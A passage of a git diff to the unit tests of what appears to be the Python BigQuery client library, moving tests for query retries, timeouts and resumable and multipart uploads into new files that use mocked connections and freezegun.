make_connection(begun_resource, query_resource, done_resource) + client = _make_client(project=PROJECT, connection=connection) + job = QueryJob(JOB_ID, QUERY, client) + job._properties["jobReference"]["location"] = "US" + job._properties["status"] = {"state": "RUNNING"} + + with freezegun.freeze_time("1970-01-01 00:00:00", tick=False): + job.result( + timeout=1.125, + ) + + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "US"}, + timeout=1.125, + ) + get_query_results_call 
= mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={ + "maxResults": 0, + "location": "US", + }, + timeout=_MIN_GET_QUERY_RESULTS_TIMEOUT, + ) + connection.api_request.assert_has_calls( + [ + reload_call, + get_query_results_call, + reload_call, + ] + ) + + +def test_result_w_timeout_raises_concurrent_futures_timeout(global_time_lock): + begun_resource = _make_resource() + begun_resource["jobReference"]["location"] = "US" + query_resource = { + "jobComplete": True, + "jobReference": {"projectId": PROJECT, "jobId": JOB_ID}, + "schema": {"fields": [{"name": "col1", "type": "STRING"}]}, + } + done_resource = begun_resource.copy() + done_resource["status"] = {"state": "DONE"} + connection = make_connection(begun_resource, query_resource, done_resource) + client = _make_client(project=PROJECT, connection=connection) + job = QueryJob(JOB_ID, QUERY, client) + job._properties["jobReference"]["location"] = "US" + job._properties["status"] = {"state": "RUNNING"} + + with freezegun.freeze_time( + "1970-01-01 00:00:00", auto_tick_seconds=1.0 + ), pytest.raises(concurrent.futures.TimeoutError): + job.result(timeout=1.125) + + reload_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/jobs/{JOB_ID}", + query_params={"projection": "full", "location": "US"}, + timeout=1.125, + ) + get_query_results_call = mock.call( + method="GET", + path=f"/projects/{PROJECT}/queries/{JOB_ID}", + query_params={ + "maxResults": 0, + "location": "US", + }, + timeout=_MIN_GET_QUERY_RESULTS_TIMEOUT, + ) + connection.api_request.assert_has_calls( + [ + reload_call, + get_query_results_call, + ] + ) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 417f911b8..1f543f033 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -15,7 +15,6 @@ from typing import Any, Dict, Optional from unittest import mock -import freezegun import google.api_core.exceptions from google.api_core import retry 
as retries import pytest @@ -450,110 +449,6 @@ def test_query_and_wait_uses_jobs_insert(): ) -def test_query_and_wait_retries_job(): - freezegun.freeze_time(auto_tick_seconds=100) - client = mock.create_autospec(Client) - client._call_api.__name__ = "_call_api" - client._call_api.__qualname__ = "Client._call_api" - client._call_api.__annotations__ = {} - client._call_api.__type_params__ = () - client._call_api.side_effect = ( - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - google.api_core.exceptions.BadGateway("retry me"), - { - "jobReference": { - "projectId": "response-project", - "jobId": "abc", - "location": "response-location", - }, - "jobComplete": True, - "schema": { - "fields": [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "age", "type": "INT64", "mode": "NULLABLE"}, - ], - }, - "rows": [ - {"f": [{"v": "Whillma Phlyntstone"}, {"v": "27"}]}, - {"f": [{"v": "Bhetty Rhubble"}, {"v": "28"}]}, - {"f": [{"v": "Phred Phlyntstone"}, {"v": "32"}]}, - {"f": [{"v": "Bharney Rhubble"}, {"v": "33"}]}, - ], - }, - ) - rows = _job_helpers.query_and_wait( - client, - query="SELECT 1", - location="request-location", - project="request-project", - job_config=None, - page_size=None, - max_results=None, - retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), - multiplier=1.0, - ).with_deadline( - 200.0 - ), # Since auto_tick_seconds is 100, we should get at least 1 retry. - job_retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.InternalServerError), - multiplier=1.0, - ).with_deadline(600.0), - ) - assert len(list(rows)) == 4 - - # For this code path, where the query has finished immediately, we should - # only be calling the jobs.query API and no other request path. 
- request_path = "/projects/request-project/queries" - for call in client._call_api.call_args_list: - _, kwargs = call - assert kwargs["method"] == "POST" - assert kwargs["path"] == request_path - - -@freezegun.freeze_time(auto_tick_seconds=100) -def test_query_and_wait_retries_job_times_out(): - client = mock.create_autospec(Client) - client._call_api.__name__ = "_call_api" - client._call_api.__qualname__ = "Client._call_api" - client._call_api.__annotations__ = {} - client._call_api.__type_params__ = () - client._call_api.side_effect = ( - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - google.api_core.exceptions.BadGateway("retry me"), - google.api_core.exceptions.InternalServerError("job_retry me"), - ) - - with pytest.raises(google.api_core.exceptions.RetryError) as exc_info: - _job_helpers.query_and_wait( - client, - query="SELECT 1", - location="request-location", - project="request-project", - job_config=None, - page_size=None, - max_results=None, - retry=retries.Retry( - lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), - multiplier=1.0, - ).with_deadline( - 200.0 - ), # Since auto_tick_seconds is 100, we should get at least 1 retry. 
- job_retry=retries.Retry( - lambda exc: isinstance( - exc, google.api_core.exceptions.InternalServerError - ), - multiplier=1.0, - ).with_deadline(400.0), - ) - - assert isinstance( - exc_info.value.cause, google.api_core.exceptions.InternalServerError - ) - - def test_query_and_wait_sets_job_creation_mode(): client = mock.create_autospec(Client) client.default_job_creation_mode = "JOB_CREATION_OPTIONAL" diff --git a/tests/unit/test__job_helpers_retry.py b/tests/unit/test__job_helpers_retry.py new file mode 100644 index 000000000..3ea4b1aae --- /dev/null +++ b/tests/unit/test__job_helpers_retry.py @@ -0,0 +1,122 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import freezegun +import google.api_core.exceptions +from google.api_core import retry as retries +import pytest + +from google.cloud.bigquery import _job_helpers + +from . 
import helpers + + +def test_query_and_wait_retries_job(global_time_lock): + with freezegun.freeze_time(auto_tick_seconds=100): + conn = helpers.make_connection( + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + google.api_core.exceptions.BadGateway("retry me"), + { + "jobReference": { + "projectId": "response-project", + "jobId": "abc", + "location": "response-location", + }, + "jobComplete": True, + "schema": { + "fields": [ + {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, + {"name": "age", "type": "INT64", "mode": "NULLABLE"}, + ], + }, + "rows": [ + {"f": [{"v": "Whillma Phlyntstone"}, {"v": "27"}]}, + {"f": [{"v": "Bhetty Rhubble"}, {"v": "28"}]}, + {"f": [{"v": "Phred Phlyntstone"}, {"v": "32"}]}, + {"f": [{"v": "Bharney Rhubble"}, {"v": "33"}]}, + ], + }, + ) + client = helpers.make_client(project="client-project") + client._connection = conn + rows = _job_helpers.query_and_wait( + client, + query="SELECT 1", + location="request-location", + project="request-project", + job_config=None, + page_size=None, + max_results=None, + retry=retries.Retry( + lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), + multiplier=1.0, + ).with_deadline( + 200.0 + ), # Since auto_tick_seconds is 100, we should get at least 1 retry. + job_retry=retries.Retry( + lambda exc: isinstance( + exc, google.api_core.exceptions.InternalServerError + ), + multiplier=1.0, + ).with_deadline(600.0), + ) + assert len(list(rows)) == 4 + + # For this code path, where the query has finished immediately, we should + # only be calling the jobs.query API and no other request path. 
+ request_path = "/projects/request-project/queries" + for call in client._connection.api_request.call_args_list: + _, kwargs = call + assert kwargs["method"] == "POST" + assert kwargs["path"] == request_path + + +def test_query_and_wait_retries_job_times_out(global_time_lock): + with freezegun.freeze_time(auto_tick_seconds=100): + conn = helpers.make_connection( + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + google.api_core.exceptions.BadGateway("retry me"), + google.api_core.exceptions.InternalServerError("job_retry me"), + ) + client = helpers.make_client(project="client-project") + client._connection = conn + + with pytest.raises(google.api_core.exceptions.RetryError) as exc_info: + _job_helpers.query_and_wait( + client, + query="SELECT 1", + location="request-location", + project="request-project", + job_config=None, + page_size=None, + max_results=None, + retry=retries.Retry( + lambda exc: isinstance(exc, google.api_core.exceptions.BadGateway), + multiplier=1.0, + ).with_deadline( + 200.0 + ), # Since auto_tick_seconds is 100, we should get at least 1 retry. 
+ job_retry=retries.Retry( + lambda exc: isinstance( + exc, google.api_core.exceptions.InternalServerError + ), + multiplier=1.0, + ).with_deadline(400.0), + ) + + assert isinstance( + exc_info.value.cause, google.api_core.exceptions.InternalServerError + ) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index c3cf33279..213f382dc 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -16,7 +16,6 @@ import collections import datetime import decimal -import email import gzip import http.client import io @@ -28,13 +27,10 @@ from unittest import mock import warnings -import freezegun import packaging import pytest import requests -import google.api - try: import opentelemetry @@ -58,8 +54,6 @@ import google.cloud._helpers from google.cloud import bigquery -from google.cloud.bigquery import job as bqjob -import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference, Dataset from google.cloud.bigquery.enums import UpdateMode, DatasetView from google.cloud.bigquery import exceptions @@ -313,31 +307,6 @@ def test__call_api_extra_headers(self): headers = kwargs["headers"] assert headers["x-goog-request-reason"] == "because-friday" - def test__call_api_applying_custom_retry_on_timeout(self): - from concurrent.futures import TimeoutError - from google.cloud.bigquery.retry import DEFAULT_RETRY - - creds = _make_credentials() - client = self._make_one(project=self.PROJECT, credentials=creds) - - api_request_patcher = mock.patch.object( - client._connection, - "api_request", - side_effect=[TimeoutError, "result"], - ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, TimeoutError) - ) - - with api_request_patcher as fake_api_request: - result = client._call_api(retry, foo="bar") - - self.assertEqual(result, "result") - self.assertEqual( - fake_api_request.call_args_list, - [mock.call(foo="bar"), mock.call(foo="bar")], # was retried once - ) - def 
test__call_api_span_creator_not_called(self): from concurrent.futures import TimeoutError from google.cloud.bigquery.retry import DEFAULT_RETRY @@ -644,48 +613,6 @@ def test_get_service_account_email_w_alternate_project(self): ) self.assertEqual(service_account_email, email) - def test_get_service_account_email_w_custom_retry(self): - from google.cloud.bigquery.retry import DEFAULT_RETRY - - api_path = "/projects/{}/serviceAccount".format(self.PROJECT) - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - - resource = { - "kind": "bigquery#getServiceAccountResponse", - "email": "bq-123@bigquery-encryption.iam.gserviceaccount.com", - } - api_request_patcher = mock.patch.object( - client._connection, - "api_request", - side_effect=[ValueError, resource], - ) - - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( - lambda exc: isinstance(exc, ValueError) - ) - - with api_request_patcher as fake_api_request: - with mock.patch( - "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" - ) as final_attributes: - service_account_email = client.get_service_account_email( - retry=retry, timeout=7.5 - ) - - final_attributes.assert_called_once_with({"path": api_path}, client, None) - self.assertEqual( - service_account_email, "bq-123@bigquery-encryption.iam.gserviceaccount.com" - ) - self.assertEqual( - fake_api_request.call_args_list, - [ - mock.call(method="GET", path=api_path, timeout=7.5), - mock.call(method="GET", path=api_path, timeout=7.5), # was retried once - ], - ) - def test_dataset_with_specified_project(self): from google.cloud.bigquery.dataset import DatasetReference @@ -3848,176 +3775,6 @@ def test_load_table_from_uri_w_default_load_config(self): timeout=DEFAULT_TIMEOUT, ) - @staticmethod - def _mock_requests_response(status_code, headers, content=b""): - return mock.Mock( - content=content, - headers=headers, - status_code=status_code, - spec=["content", "headers", 
"status_code"], - ) - - def _mock_transport(self, status_code, headers, content=b""): - fake_transport = mock.Mock(spec=["request"]) - fake_response = self._mock_requests_response( - status_code, headers, content=content - ) - fake_transport.request.return_value = fake_response - return fake_transport - - def _initiate_resumable_upload_helper(self, num_retries=None, mtls=False): - from google.resumable_media.requests import ResumableUpload - from google.cloud.bigquery.client import _DEFAULT_CHUNKSIZE - from google.cloud.bigquery.client import _GENERIC_CONTENT_TYPE - from google.cloud.bigquery.client import _get_upload_headers - from google.cloud.bigquery.job import LoadJob - from google.cloud.bigquery.job import LoadJobConfig - from google.cloud.bigquery.job import SourceFormat - - # Create mocks to be checked for doing transport. - resumable_url = "http://test.invalid?upload_id=hey-you" - response_headers = {"location": resumable_url} - fake_transport = self._mock_transport(http.client.OK, response_headers) - client = self._make_one(project=self.PROJECT, _http=fake_transport) - conn = client._connection = make_connection() - if mtls: - conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") - - # Create some mock arguments and call the method under test. - data = b"goodbye gudbi gootbee" - stream = io.BytesIO(data) - config = LoadJobConfig() - config.source_format = SourceFormat.CSV - job = LoadJob(None, None, self.TABLE_REF, client, job_config=config) - metadata = job.to_api_repr() - upload, transport = client._initiate_resumable_upload( - stream, metadata, num_retries, None - ) - - # Check the returned values. 
- self.assertIsInstance(upload, ResumableUpload) - - host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" - upload_url = ( - f"{host_name}/upload/bigquery/v2/projects/{self.PROJECT}" - "/jobs?uploadType=resumable" - ) - self.assertEqual(upload.upload_url, upload_url) - expected_headers = _get_upload_headers(conn.user_agent) - self.assertEqual(upload._headers, expected_headers) - self.assertFalse(upload.finished) - self.assertEqual(upload._chunk_size, _DEFAULT_CHUNKSIZE) - self.assertIs(upload._stream, stream) - self.assertIsNone(upload._total_bytes) - self.assertEqual(upload._content_type, _GENERIC_CONTENT_TYPE) - self.assertEqual(upload.resumable_url, resumable_url) - - retry_strategy = upload._retry_strategy - self.assertEqual(retry_strategy.max_sleep, 64.0) - if num_retries is None: - self.assertEqual(retry_strategy.max_cumulative_retry, 600.0) - self.assertIsNone(retry_strategy.max_retries) - else: - self.assertIsNone(retry_strategy.max_cumulative_retry) - self.assertEqual(retry_strategy.max_retries, num_retries) - self.assertIs(transport, fake_transport) - # Make sure we never read from the stream. - self.assertEqual(stream.tell(), 0) - - # Check the mocks. 
- request_headers = expected_headers.copy() - request_headers["x-upload-content-type"] = _GENERIC_CONTENT_TYPE - fake_transport.request.assert_called_once_with( - "POST", - upload_url, - data=json.dumps(metadata).encode("utf-8"), - headers=request_headers, - timeout=mock.ANY, - ) - - def test__initiate_resumable_upload(self): - self._initiate_resumable_upload_helper() - - def test__initiate_resumable_upload_mtls(self): - self._initiate_resumable_upload_helper(mtls=True) - - def test__initiate_resumable_upload_with_retry(self): - self._initiate_resumable_upload_helper(num_retries=11) - - def _do_multipart_upload_success_helper( - self, get_boundary, num_retries=None, project=None, mtls=False - ): - from google.cloud.bigquery.client import _get_upload_headers - from google.cloud.bigquery.job import LoadJob - from google.cloud.bigquery.job import LoadJobConfig - from google.cloud.bigquery.job import SourceFormat - - fake_transport = self._mock_transport(http.client.OK, {}) - client = self._make_one(project=self.PROJECT, _http=fake_transport) - conn = client._connection = make_connection() - if mtls: - conn.get_api_base_url_for_mtls = mock.Mock(return_value="https://foo.mtls") - - if project is None: - project = self.PROJECT - - # Create some mock arguments. - data = b"Bzzzz-zap \x00\x01\xf4" - stream = io.BytesIO(data) - config = LoadJobConfig() - config.source_format = SourceFormat.CSV - job = LoadJob(None, None, self.TABLE_REF, client, job_config=config) - metadata = job.to_api_repr() - size = len(data) - - response = client._do_multipart_upload( - stream, metadata, size, num_retries, None, project=project - ) - - # Check the mocks and the returned value. 
- self.assertIs(response, fake_transport.request.return_value) - self.assertEqual(stream.tell(), size) - get_boundary.assert_called_once_with() - - host_name = "https://foo.mtls" if mtls else "https://bigquery.googleapis.com" - upload_url = ( - f"{host_name}/upload/bigquery/v2/projects/{project}" - "/jobs?uploadType=multipart" - ) - payload = ( - b"--==0==\r\n" - b"content-type: application/json; charset=UTF-8\r\n\r\n" - b"%(json_metadata)s" - b"\r\n" - b"--==0==\r\n" - b"content-type: */*\r\n\r\n" - b"%(data)s" - b"\r\n" - b"--==0==--" - ) % {b"json_metadata": json.dumps(metadata).encode("utf-8"), b"data": data} - - headers = _get_upload_headers(conn.user_agent) - headers["content-type"] = b'multipart/related; boundary="==0=="' - fake_transport.request.assert_called_once_with( - "POST", upload_url, data=payload, headers=headers, timeout=mock.ANY - ) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_mtls(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, mtls=True) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_with_retry(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, num_retries=8) - - @mock.patch("google.resumable_media._upload.get_boundary", return_value=b"==0==") - def test__do_multipart_upload_with_custom_project(self, get_boundary): - self._do_multipart_upload_success_helper(get_boundary, project="custom-project") - def test_copy_table(self): from google.cloud.bigquery.job import CopyJob @@ -5543,143 +5300,6 @@ def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails_no_retries(self job_retry=None, ) - def 
test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404(self): - """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 - - Sometimes after a Conflict, the fetch fails with a 404, but we know - because of the conflict that really the job does exist. Retry until we - get the job status (or timeout). - """ - job_id = "abc123" - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - conn = client._connection = make_connection( - # We're mocking QueryJob._begin, so this is only going to be - # jobs.get requests and responses. - google.api_core.exceptions.TooManyRequests("this is retriable by default"), - google.api_core.exceptions.NotFound("we lost your job"), - google.api_core.exceptions.NotFound("we lost your job again, sorry"), - { - "jobReference": { - "projectId": self.PROJECT, - "location": "TESTLOC", - "jobId": job_id, - } - }, - ) - - job_create_error = google.api_core.exceptions.Conflict("Job already exists.") - job_begin_patcher = mock.patch.object( - bqjob.QueryJob, "_begin", side_effect=job_create_error - ) - job_id_patcher = mock.patch.object( - google.cloud.bigquery._job_helpers, - "make_job_id", - return_value=job_id, - ) - - with job_begin_patcher, job_id_patcher: - # If get job request fails there does exist a job - # with this ID already, retry 404 until we get it (or fails for a - # non-retriable reason, see other tests). - result = client.query("SELECT 1;", job_id=None) - - jobs_get_path = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - # Double-check that it was jobs.get that was called for each of our - # mocked responses. 
- [jobs_get_path] - * 4, - ) - assert result.job_id == job_id - - def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( - self, - ): - """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 - - Sometimes after a Conflict, the fetch fails with a 404. If it keeps - failing with a 404, assume that the job actually doesn't exist. - """ - job_id_1 = "abc123" - job_id_2 = "xyz789" - creds = _make_credentials() - http = object() - client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) - - # We're mocking QueryJob._begin, so that the connection should only get - # jobs.get requests. - job_create_error = google.api_core.exceptions.Conflict("Job already exists.") - job_begin_patcher = mock.patch.object( - bqjob.QueryJob, "_begin", side_effect=job_create_error - ) - conn = client._connection = make_connection( - google.api_core.exceptions.NotFound("we lost your job again, sorry"), - { - "jobReference": { - "projectId": self.PROJECT, - "location": "TESTLOC", - "jobId": job_id_2, - } - }, - ) - - # Choose a small deadline so the 404 retries give up. - retry = ( - google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) - ) - job_id_patcher = mock.patch.object( - google.cloud.bigquery._job_helpers, - "make_job_id", - side_effect=[job_id_1, job_id_2], - ) - retry_patcher = mock.patch.object( - google.cloud.bigquery.retry, - "_DEFAULT_GET_JOB_CONFLICT_RETRY", - retry, - ) - - with freezegun.freeze_time( - "2025-01-01 00:00:00", - # 10x the retry deadline to guarantee a timeout. - auto_tick_seconds=10, - ), job_begin_patcher, job_id_patcher, retry_patcher: - # If get job request fails there does exist a job - # with this ID already, retry 404 until we get it (or fails for a - # non-retriable reason, see other tests). 
- result = client.query("SELECT 1;", job_id=None) - - jobs_get_path_1 = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id_1}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - jobs_get_path_2 = mock.call( - method="GET", - path=f"/projects/{self.PROJECT}/jobs/{job_id_2}", - query_params={ - "projection": "full", - }, - timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, - ) - conn.api_request.assert_has_calls( - # Double-check that it was jobs.get that was called for each of our - # mocked responses. - [jobs_get_path_1, jobs_get_path_2], - ) - assert result.job_id == job_id_2 - def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_succeeds(self): from google.api_core.exceptions import Conflict from google.cloud.bigquery.job import QueryJob @@ -10032,213 +9652,6 @@ def test_load_table_from_json_unicode_emoji_data_case(self): assert sent_data_file.getvalue() == expected_bytes # Low-level tests - - @classmethod - def _make_resumable_upload_responses(cls, size): - """Make a series of responses for a successful resumable upload.""" - from google import resumable_media - - resumable_url = "http://test.invalid?upload_id=and-then-there-was-1" - initial_response = cls._make_response( - http.client.OK, "", {"location": resumable_url} - ) - data_response = cls._make_response( - resumable_media.PERMANENT_REDIRECT, - "", - {"range": "bytes=0-{:d}".format(size - 1)}, - ) - final_response = cls._make_response( - http.client.OK, - json.dumps({"size": size}), - {"Content-Type": "application/json"}, - ) - return [initial_response, data_response, final_response] - - @staticmethod - def _make_transport(responses=None): - import google.auth.transport.requests - - transport = mock.create_autospec( - google.auth.transport.requests.AuthorizedSession, instance=True - ) - transport.request.side_effect = responses - return transport - - def test__do_resumable_upload(self): - file_obj = 
self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - result = client._do_resumable_upload( - file_obj, self.EXPECTED_CONFIGURATION, None, None - ) - - content = result.content.decode("utf-8") - assert json.loads(content) == {"size": file_obj_len} - - # Verify that configuration data was passed in with the initial - # request. - transport.request.assert_any_call( - "POST", - mock.ANY, - data=json.dumps(self.EXPECTED_CONFIGURATION).encode("utf-8"), - headers=mock.ANY, - timeout=mock.ANY, - ) - - def test__do_resumable_upload_custom_project(self): - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - result = client._do_resumable_upload( - file_obj, - self.EXPECTED_CONFIGURATION, - None, - None, - project="custom-project", - ) - - content = result.content.decode("utf-8") - assert json.loads(content) == {"size": file_obj_len} - - # Verify that configuration data was passed in with the initial - # request. 
- transport.request.assert_any_call( - "POST", - mock.ANY, - data=json.dumps(self.EXPECTED_CONFIGURATION).encode("utf-8"), - headers=mock.ANY, - timeout=mock.ANY, - ) - - initiation_url = next( - ( - call[0][1] - for call in transport.request.call_args_list - if call[0][0] == "POST" and "uploadType=resumable" in call[0][1] - ), - None, - ) # pragma: NO COVER - - assert initiation_url is not None - assert "projects/custom-project" in initiation_url - - def test__do_resumable_upload_custom_timeout(self): - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - transport = self._make_transport( - self._make_resumable_upload_responses(file_obj_len) - ) - client = self._make_client(transport) - - client._do_resumable_upload( - file_obj, self.EXPECTED_CONFIGURATION, num_retries=0, timeout=3.14 - ) - - # The timeout should be applied to all underlying calls. - for call_args in transport.request.call_args_list: - assert call_args[1].get("timeout") == 3.14 - - def test__do_multipart_upload(self): - transport = self._make_transport([self._make_response(http.client.OK)]) - client = self._make_client(transport) - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - - client._do_multipart_upload( - file_obj, self.EXPECTED_CONFIGURATION, file_obj_len, None, None - ) - - # Verify that configuration data was passed in with the initial - # request. - request_args = transport.request.mock_calls[0][2] - request_data = request_args["data"].decode("utf-8") - request_headers = request_args["headers"] - - request_content = email.message_from_string( - "Content-Type: {}\r\n{}".format( - request_headers["content-type"].decode("utf-8"), request_data - ) - ) - - # There should be two payloads: the configuration and the binary daya. 
- configuration_data = request_content.get_payload(0).get_payload() - binary_data = request_content.get_payload(1).get_payload() - - assert json.loads(configuration_data) == self.EXPECTED_CONFIGURATION - assert binary_data.encode("utf-8") == file_obj.getvalue() - - def test__do_multipart_upload_wrong_size(self): - client = self._make_client() - file_obj = self._make_file_obj() - file_obj_len = len(file_obj.getvalue()) - - with pytest.raises(ValueError): - client._do_multipart_upload(file_obj, {}, file_obj_len + 1, None, None) - - def test_schema_from_json_with_file_path(self): - from google.cloud.bigquery.schema import SchemaField - - file_content = """[ - { - "description": "quarter", - "mode": "REQUIRED", - "name": "qtr", - "type": "STRING" - }, - { - "description": "sales representative", - "mode": "NULLABLE", - "name": "rep", - "type": "STRING" - }, - { - "description": "total sales", - "mode": "NULLABLE", - "name": "sales", - "type": "FLOAT" - } - ]""" - - expected = [ - SchemaField("qtr", "STRING", "REQUIRED", description="quarter"), - SchemaField( - "rep", - "STRING", - "NULLABLE", - description="sales representative", - ), - SchemaField( - "sales", - "FLOAT", - "NULLABLE", - description="total sales", - ), - ] - - client = self._make_client() - mock_file_path = "/mocked/file.json" - - open_patch = mock.patch( - "builtins.open", new=mock.mock_open(read_data=file_content) - ) - - with open_patch as _mock_file: - actual = client.schema_from_json(mock_file_path) - _mock_file.assert_called_once_with(mock_file_path) - # This assert is to make sure __exit__ is called in the context - # manager that opens the file in the function - _mock_file().__exit__.assert_called_once() - - assert expected == actual - def test_schema_from_json_with_file_object(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_client_bigframes.py b/tests/unit/test_client_bigframes.py index 0fcc31e40..0260da5e4 100644 --- 
a/tests/unit/test_client_bigframes.py +++ b/tests/unit/test_client_bigframes.py @@ -338,7 +338,7 @@ def test_query_and_wait_bigframes_with_jobs_insert_dry_run_no_callback(client): assert result.schema == [bigquery.SchemaField("_f0", "INTEGER")] -def test_query_and_wait_bigframes_with_query_retry_callbacks(client): +def test_query_and_wait_bigframes_with_query_retry_callbacks(client, global_time_lock): created = datetime.datetime( 2025, 8, 18, 10, 11, 12, 345000, tzinfo=datetime.timezone.utc ) diff --git a/tests/unit/test_client_resumable_media_upload.py b/tests/unit/test_client_resumable_media_upload.py new file mode 100644 index 000000000..642c18d15 --- /dev/null +++ b/tests/unit/test_client_resumable_media_upload.py @@ -0,0 +1,433 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from unittest import mock +import email +import http.client +import io +import json + +import pytest + +from google.cloud.bigquery.table import TableReference + +from .helpers import make_connection + + +PROJECT = "test-project" +TABLE_REF = TableReference.from_string(f"{PROJECT}.test_dataset.test_table") +EXPECTED_CONFIGURATION = { + "load": { + "destinationTable": { + "projectId": PROJECT, + "datasetId": "test_dataset", + "tableId": "test_table", + }, + "sourceFormat": "CSV", + } +} + + +@pytest.fixture(autouse=True) +def mock_sleep(monkeypatch): + sleep = mock.Mock() + monkeypatch.setattr("time.sleep", sleep) + + +def _make_credentials(): + import google.auth.credentials + + return mock.Mock(spec=google.auth.credentials.Credentials) + + +def _make_client(*args, **kw): + from google.cloud.bigquery.client import Client + + kw["credentials"] = _make_credentials() + kw["project"] = PROJECT + return Client(*args, **kw) + + +def _make_file_obj(contents=b"some data"): + return io.BytesIO(contents) + + +def _make_response(status_code, content=b"", headers=None): + response = mock.Mock(spec=["status_code", "content", "request", "headers"]) + response.status_code = status_code + response.content = content + response.headers = headers or {} + response.request = mock.Mock(spec=["headers"]) + return response + + +def _make_resumable_upload_responses(num_bytes): + # In a real scenario, the upload URL is returned in a 'Location' + # header. 
+ return [ + _make_response( + http.client.OK, + headers={"location": "http://test.invalid/upload-id"}, + ), + _make_response( + http.client.OK, content=json.dumps({"size": num_bytes}).encode("utf-8") + ), + ] + + +def _make_transport(responses=None): + import google.auth.transport.requests + + transport = mock.create_autospec( + google.auth.transport.requests.AuthorizedSession, instance=True + ) + transport.request.side_effect = responses + return transport + + +def _mock_requests_response(status_code, headers, content=b""): + return mock.Mock( + content=content, + headers=headers, + status_code=status_code, + spec=["content", "headers", "status_code"], + ) + + +def _mock_transport(status_code, headers, content=b""): + fake_transport = mock.Mock(spec=["request"]) + fake_response = _mock_requests_response(status_code, headers, content=content) + fake_transport.request.return_value = fake_response + return fake_transport + + +def _initiate_resumable_upload_helper(num_retries=None, mtls=False): + from google.resumable_media.requests import ResumableUpload + from google.cloud.bigquery.client import _DEFAULT_CHUNKSIZE + from google.cloud.bigquery.client import _GENERIC_CONTENT_TYPE + from google.cloud.bigquery.client import _get_upload_headers + from google.cloud.bigquery.job import LoadJob + from google.cloud.bigquery.job import LoadJobConfig + from google.cloud.bigquery.job import SourceFormat + + # Create mocks to be checked for doing transport. + resumable_url = "http://test.invalid?upload_id=hey-you" + response_headers = {"location": resumable_url} + fake_transport = 